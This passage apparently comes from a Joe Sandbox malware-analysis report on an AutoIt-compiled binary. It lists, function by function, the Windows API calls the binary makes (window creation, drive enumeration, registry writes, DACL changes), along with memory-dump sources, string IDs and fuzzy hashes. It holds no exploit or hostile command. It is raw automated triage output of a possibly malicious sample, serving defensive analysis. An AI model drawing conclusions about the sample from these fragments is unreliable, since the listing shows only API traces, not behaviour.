                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 00DF29DD
                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00DF2A1D
                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00DF2A31
                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 00DF2A42
                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00DF2A77
                                              • GetStockObject.GDI32(00000011), ref: 00DF2A82
                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00DF2A8D
                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00DF2A97
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                              • API String ID: 2910397461-517079104
                                              • Opcode ID: 31669fb0c37dfc85720ffc8a8dd62e2db2ddaf5b9ddc5ebc796704e5a42f9a4f
                                              • Instruction ID: 6e46e45d9b3c83a3f2cb7a4a70f417117b866a1e4dd0dae970d131dfd8a16db2
                                              • Opcode Fuzzy Hash: 31669fb0c37dfc85720ffc8a8dd62e2db2ddaf5b9ddc5ebc796704e5a42f9a4f
                                              • Instruction Fuzzy Hash: 63B16C75A00209AFEB14DFA9CC49FAE7BB9EB08710F118255FA14E7290D770AD45CBA0
                                              Function 00DE4ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 00DE4AED
                                              • GetDriveTypeW.KERNEL32(?,00E0CB68,?,\\.\,00E0CC08), ref: 00DE4BCA
                                              • SetErrorMode.KERNEL32(00000000,00E0CB68,?,\\.\,00E0CC08), ref: 00DE4D36
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ErrorMode$DriveType
                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                              • API String ID: 2907320926-4222207086
                                              • Opcode ID: 358a8bb9f4b4397e8028da83977e293465807274e9843ccad66aea0795bf7e00
                                              • Instruction ID: a49c4dcf30ef46d87d334518ad223986c0b847af5b39f642b42e7e8639917527
                                              • Opcode Fuzzy Hash: 358a8bb9f4b4397e8028da83977e293465807274e9843ccad66aea0795bf7e00
                                              • Instruction Fuzzy Hash: 2B61A330605245ABCB04FF26C986969BBB1EF44304F38D415F84ABB691EB36ED41DB71
                                              Function 00D88D85 Relevance: 40.7, APIs: 22, Strings: 1, Instructions: 480windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DestroyWindow.USER32(?,?), ref: 00D88E14
                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 00DC6AC5
                                              • 6F540200.COMCTL32(?,000000FF,?), ref: 00DC6AFE
                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00DC6F43
                                                • Part of subcall function 00D88F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D88BE8,?,00000000,?,?,?,?,00D88BBA,00000000,?), ref: 00D88FC5
                                              • SendMessageW.USER32(?,00001053), ref: 00DC6F7F
                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00DC6F96
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$DestroyF540200InvalidateMoveRect
                                              • String ID: 0
                                              • API String ID: 2339618693-4108050209
                                              • Opcode ID: 76907d44ef800cfd5ac7a9c849f31d1f2dfee90f0d40d12c571c318681b971dc
                                              • Instruction ID: fc1fb732000afdebf67ace67b51d8523aa81fde835b653a384e0ec57e9cd3654
                                              • Opcode Fuzzy Hash: 76907d44ef800cfd5ac7a9c849f31d1f2dfee90f0d40d12c571c318681b971dc
                                              • Instruction Fuzzy Hash: 3E129C34200202AFDB25DF24C944FA5BBE5FF49301F58856DF5859B261CB32EC96DB61
                                              Function 00E073E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSysColor.USER32(00000012), ref: 00E07421
                                              • SetTextColor.GDI32(?,?), ref: 00E07425
                                              • GetSysColorBrush.USER32(0000000F), ref: 00E0743B
                                              • GetSysColor.USER32(0000000F), ref: 00E07446
                                              • CreateSolidBrush.GDI32(?), ref: 00E0744B
                                              • GetSysColor.USER32(00000011), ref: 00E07463
                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E07471
                                              • SelectObject.GDI32(?,00000000), ref: 00E07482
                                              • SetBkColor.GDI32(?,00000000), ref: 00E0748B
                                              • SelectObject.GDI32(?,?), ref: 00E07498
                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00E074B7
                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E074CE
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00E074DB
                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E0752A
                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00E07554
                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 00E07572
                                              • DrawFocusRect.USER32(?,?), ref: 00E0757D
                                              • GetSysColor.USER32(00000011), ref: 00E0758E
                                              • SetTextColor.GDI32(?,00000000), ref: 00E07596
                                              • DrawTextW.USER32(?,00E070F5,000000FF,?,00000000), ref: 00E075A8
                                              • SelectObject.GDI32(?,?), ref: 00E075BF
                                              • DeleteObject.GDI32(?), ref: 00E075CA
                                              • SelectObject.GDI32(?,?), ref: 00E075D0
                                              • DeleteObject.GDI32(?), ref: 00E075D5
                                              • SetTextColor.GDI32(?,?), ref: 00E075DB
                                              • SetBkColor.GDI32(?,?), ref: 00E075E5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                              • String ID:
                                              • API String ID: 1996641542-0
                                              • Opcode ID: 66b4469fefb407f3dbf796509cc153b9f28bc66c076b6d4a8dec45f6ef4c5672
                                              • Instruction ID: b8e2265df091c6aa2196b1ba32f586fb00c0a3c15ef2bde226fc88e5aa319ae7
                                              • Opcode Fuzzy Hash: 66b4469fefb407f3dbf796509cc153b9f28bc66c076b6d4a8dec45f6ef4c5672
                                              • Instruction Fuzzy Hash: C4616E76D00218AFDF019FA5DC49AEE7FB9EB09320F204215F915BB2E1D771A980CB90
                                              Function 00E00FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCursorPos.USER32(?), ref: 00E01128
                                              • GetDesktopWindow.USER32 ref: 00E0113D
                                              • GetWindowRect.USER32(00000000), ref: 00E01144
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E01199
                                              • DestroyWindow.USER32(?), ref: 00E011B9
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00E011ED
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E0120B
                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E0121D
                                              • SendMessageW.USER32(00000000,00000421,?,?), ref: 00E01232
                                              • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00E01245
                                              • IsWindowVisible.USER32(00000000), ref: 00E012A1
                                              • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00E012BC
                                              • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00E012D0
                                              • GetWindowRect.USER32(00000000,?), ref: 00E012E8
                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00E0130E
                                              • GetMonitorInfoW.USER32(00000000,?), ref: 00E01328
                                              • CopyRect.USER32(?,?), ref: 00E0133F
                                              • SendMessageW.USER32(00000000,00000412,00000000), ref: 00E013AA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                              • String ID: ($0$tooltips_class32
                                              • API String ID: 698492251-4156429822
                                              • Opcode ID: 7edb61f4b21e4ffd4fd62a1784080445ac9f029003bd3a68eb54648465e9d456
                                              • Instruction ID: 663515adc71450cf30f674a5fbcdd226c9a9bf25f0c54d1e7b8cab72c23f3679
                                              • Opcode Fuzzy Hash: 7edb61f4b21e4ffd4fd62a1784080445ac9f029003bd3a68eb54648465e9d456
                                              • Instruction Fuzzy Hash: 2CB1AC71608341AFD714DF65C884B6EBBE4FF84754F00895CF999AB2A1D731E884CBA2
                                              Function 00D88891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D88968
                                              • GetSystemMetrics.USER32(00000007), ref: 00D88970
                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D8899B
                                              • GetSystemMetrics.USER32(00000008), ref: 00D889A3
                                              • GetSystemMetrics.USER32(00000004), ref: 00D889C8
                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00D889E5
                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00D889F5
                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00D88A28
                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00D88A3C
                                              • GetClientRect.USER32(00000000,000000FF), ref: 00D88A5A
                                              • GetStockObject.GDI32(00000011), ref: 00D88A76
                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00D88A81
                                                • Part of subcall function 00D8912D: GetCursorPos.USER32(?), ref: 00D89141
                                                • Part of subcall function 00D8912D: ScreenToClient.USER32(00000000,?), ref: 00D8915E
                                                • Part of subcall function 00D8912D: GetAsyncKeyState.USER32(00000001), ref: 00D89183
                                                • Part of subcall function 00D8912D: GetAsyncKeyState.USER32(00000002), ref: 00D8919D
                                              • SetTimer.USER32(00000000,00000000,00000028,00D890FC), ref: 00D88AA8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                              • String ID: AutoIt v3 GUI
                                              • API String ID: 1458621304-248962490
                                              • Opcode ID: c3e5614ed6bb6ad807b155131a6fe346240803d0efde55b2d63491f4d676fcbf
                                              • Instruction ID: cdb1e9ca51db69d3633b95fd3f2ec4149a84b598a1c0036cfa473b7c71ee1588
                                              • Opcode Fuzzy Hash: c3e5614ed6bb6ad807b155131a6fe346240803d0efde55b2d63491f4d676fcbf
                                              • Instruction Fuzzy Hash: 2CB16B75A0020A9FDF14EFA9DC45BAA3BB5FB48314F144229FA15A72D0DB70E885CF61
                                              Function 00DD0D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00DD10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00DD1114
                                                • Part of subcall function 00DD10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00DD0B9B,?,?,?), ref: 00DD1120
                                                • Part of subcall function 00DD10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00DD0B9B,?,?,?), ref: 00DD112F
                                                • Part of subcall function 00DD10F9: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00DD1136
                                                • Part of subcall function 00DD10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00DD114D
                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00DD0DF5
                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00DD0E29
                                              • GetLengthSid.ADVAPI32(?), ref: 00DD0E40
                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00DD0E7A
                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00DD0E96
                                              • GetLengthSid.ADVAPI32(?), ref: 00DD0EAD
                                              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00DD0EB5
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DD0EBC
                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00DD0EDD
                                              • CopySid.ADVAPI32(00000000), ref: 00DD0EE4
                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00DD0F13
                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00DD0F35
                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00DD0F47
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD0F6E
                                              • HeapFree.KERNEL32(00000000), ref: 00DD0F75
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD0F7E
                                              • HeapFree.KERNEL32(00000000), ref: 00DD0F85
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD0F8E
                                              • HeapFree.KERNEL32(00000000), ref: 00DD0F95
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00DD0FA1
                                              • HeapFree.KERNEL32(00000000), ref: 00DD0FA8
                                                • Part of subcall function 00DD1193: GetProcessHeap.KERNEL32(00000008,00DD0BB1,?,00000000,?,00DD0BB1,?), ref: 00DD11A1
                                                • Part of subcall function 00DD1193: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00DD11A8
                                                • Part of subcall function 00DD1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00DD0BB1,?), ref: 00DD11B7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Heap$Process$Security$Free$AllocateDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                              • String ID:
                                              • API String ID: 4042927181-0
                                              • Opcode ID: a2dcb09ff932e3b342a1471e3224a7b858e6b4d9895734a0d3519914d37b63ee
                                              • Instruction ID: 4c5366c0f8a611826e17534f75efbc8acd3f9f74cf92c56206c6dfbdcd32f022
                                              • Opcode Fuzzy Hash: a2dcb09ff932e3b342a1471e3224a7b858e6b4d9895734a0d3519914d37b63ee
                                              • Instruction Fuzzy Hash: E671407290420AAFDF209FA5DC48BEEBBB8FF44310F284216F955B6291D7719945CB70
                                              Function 00DFC3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DFC4BD
                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,00E0CC08,00000000,?,00000000,?,?), ref: 00DFC544
                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00DFC5A4
                                              • _wcslen.LIBCMT ref: 00DFC5F4
                                              • _wcslen.LIBCMT ref: 00DFC66F
                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00DFC6B2
                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00DFC7C1
                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00DFC84D
                                              • RegCloseKey.ADVAPI32(?), ref: 00DFC881
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00DFC88E
                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00DFC960
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                              • API String ID: 9721498-966354055
                                              • Opcode ID: 47d4f6af0d63181bc69a6e3fbb91f7515c58ad2c38b3a38c7a9e9b2ca6050ae7
                                              • Instruction ID: 94a07c0f2baa351458f8ccbf3e4f48e1f592677113d33d219e5d7366d3b4c13f
                                              • Opcode Fuzzy Hash: 47d4f6af0d63181bc69a6e3fbb91f7515c58ad2c38b3a38c7a9e9b2ca6050ae7
                                              • Instruction Fuzzy Hash: C2127A352142059FDB14DF14C981E2AB7E5EF88714F19C85CF98A9B3A2EB31EC41CBA1
                                              Function 00E0091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CharUpperBuffW.USER32(?,?), ref: 00E009C6
                                              • _wcslen.LIBCMT ref: 00E00A01
                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E00A54
                                              • _wcslen.LIBCMT ref: 00E00A8A
                                              • _wcslen.LIBCMT ref: 00E00B06
                                              • _wcslen.LIBCMT ref: 00E00B81
                                                • Part of subcall function 00D8F9F2: _wcslen.LIBCMT ref: 00D8F9FD
                                                • Part of subcall function 00DD2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DD2BFA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _wcslen$MessageSend$BuffCharUpper
                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                              • API String ID: 1103490817-4258414348
                                              • Opcode ID: dc2bb0a59c79c6598db3638b6e83941e6f7933b8ec04b60d59277ba63387d8a5
                                              • Instruction ID: a4aad1419aeb93ed143e75024e669543c48042186f9ed91b7b93f238d00b4fb2
                                              • Opcode Fuzzy Hash: dc2bb0a59c79c6598db3638b6e83941e6f7933b8ec04b60d59277ba63387d8a5
                                              • Instruction Fuzzy Hash: 79E1AE312083019FC714EF24C451A6AB7E1FF98318F54995DF89AAB3A2D730ED85CBA1
                                              Function 00DFC998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _wcslen$BuffCharUpper
                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                              • API String ID: 1256254125-909552448
                                              • Opcode ID: 3ffdce3f17c25d3f5863bb9698d839cb745324b3e7b126aa95269c6a25b215f7
                                              • Instruction ID: afba2b1cae2e2b178ae7e955d05b07b405e9d8f26a376e8a1fe970aafde3cc15
                                              • Opcode Fuzzy Hash: 3ffdce3f17c25d3f5863bb9698d839cb745324b3e7b126aa95269c6a25b215f7
                                              • Instruction Fuzzy Hash: E271193262012E8BCB20DE3CCE525BE3391DFA0754F1AA528FD95A7284E631DD65C7B0
                                              Function 00E0833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _wcslen.LIBCMT ref: 00E0835A
                                              • _wcslen.LIBCMT ref: 00E0836E
                                              • _wcslen.LIBCMT ref: 00E08391
                                              • _wcslen.LIBCMT ref: 00E083B4
